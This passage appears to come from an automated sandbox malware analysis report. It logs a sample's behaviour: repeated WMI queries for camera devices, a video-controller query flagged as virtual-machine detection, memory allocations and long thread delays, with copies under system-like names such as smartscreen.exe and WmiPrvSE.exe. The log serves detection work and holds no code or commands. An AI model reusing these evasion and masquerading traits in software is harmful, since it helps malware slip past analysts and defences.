                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeMemory allocated: CA0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeMemory allocated: 1A8D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeMemory allocated: 15A0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeMemory allocated: 1AFC0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeMemory allocated: 31A0000 memory reserve | memory write watch
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeMemory allocated: 1B380000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\smartscreen.exeMemory allocated: AB0000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\smartscreen.exeMemory allocated: 1A530000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\smartscreen.exeMemory allocated: 13E0000 memory reserve | memory write watch
                            Source: C:\Users\user\Downloads\smartscreen.exeMemory allocated: 1AED0000 memory reserve | memory write watch
                            Source: C:\Recovery\WmiPrvSE.exeMemory allocated: 1820000 memory reserve | memory write watch
                            Source: C:\Recovery\WmiPrvSE.exeMemory allocated: 1B310000 memory reserve | memory write watch
                            Source: C:\Recovery\WmiPrvSE.exeMemory allocated: E30000 memory reserve | memory write watch
                            Source: C:\Recovery\WmiPrvSE.exeMemory allocated: 1A920000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeMemory allocated: 1520000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeMemory allocated: 1AE70000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 599719Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 599516Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 599297Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 599078Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 598469Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 598125Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 597942Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 595688Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 595529Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 595328Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 595125Jump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 600000
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 599562
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 598984
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 598672
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 597906
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 597078
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 596641
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 596067
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 595375
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 595062
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 3600000
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 594234
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 593780
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 593234
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 592891
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 592516
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 591859
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 591500
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 591156
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 590859
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 590172
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 589953
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 589750
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 589516
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 589153
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 588922
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 588748
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 588453
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 588257
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 588019
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 587594
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 587391
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 587190
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 586922
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 586562
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 586348
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 585984
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 585743
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 585031
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 584708
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 584125
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 583953
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 583500
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 583371
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 582766
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 582531
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 582396
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 581172
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 579531
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 579234
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 579022
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 578594
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 578247
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 578062
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 577641
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 576484
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 576234
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 576086
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575939
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575793
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575685
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575566
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575395
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575237
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 575122
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 574993
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 574219
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 574040
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 573725
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 573437
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 573062
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 572828
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 572422
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 572196
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 572016
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 571797
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 571453
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 571222
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 570984
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 570812
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 570547
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 569516
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 568964
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 568687
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 568394
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 568178
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 568036
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 567902
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 567680
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 566844
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 566699
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 566420
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 566281
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 566141
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565964
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565816
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565702
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565509
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565406
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565199
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 565014
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564885
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564781
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564669
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564560
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564452
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564343
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeThread delayed: delay time: 564234
